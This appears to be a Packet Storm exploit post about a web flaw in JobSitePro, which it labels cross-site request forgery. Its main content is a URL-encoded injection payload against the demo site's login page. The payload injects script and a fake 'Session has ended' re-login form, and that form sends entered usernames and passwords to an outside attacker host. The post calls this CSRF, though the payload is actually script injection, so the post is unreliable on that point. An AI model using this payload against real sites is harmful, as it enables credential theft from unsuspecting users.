JobSitePro suffers from a cross site request forgery vulnerability.
a4021de28e45bb174741e36d7037a040c0df9daf92e01341bd3015a3b4c51bd2####################JobSitePro CSRF Vulnerability####################
######By: e.wiZz!
######Info: Bosnian Idiot FTW!
######Blog: infected.blogger.ba
In the wild...
#######################################################
#####Site: http://phplabs.com/demo/jobsitepro/
#####CSRF on demo site:
http://phplabs.com/demo/jobsitepro/user.php?act=login&message=%3Cscript%20language=%22javascript%22%3Edocument.getElementById('divfalso').style.visibility%20=%20%22visible%22;%20%3C/script%3E%3Cdiv%20id='divfalso'%20style='position:absolute;z-index:1;width:100%;height:100%;top:0;left:0;border:%202px%20solid%20black;background-color:%20white;visibility:false;'%3ESession%20has%20ended.%20Please%20Re-Login%3Cform%20method='post'%20action='http://www.hax0rz.com/log.php'%3EUser:%3Cinput%20type='text'%20name='login'%3E%3Cbr%3EPass:%3Cinput%20type='password'%20name='pass'%3E%3Cbr%3E%3Cinput%20type='submit'%3E%3C/form%3E%3C/div%3E
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed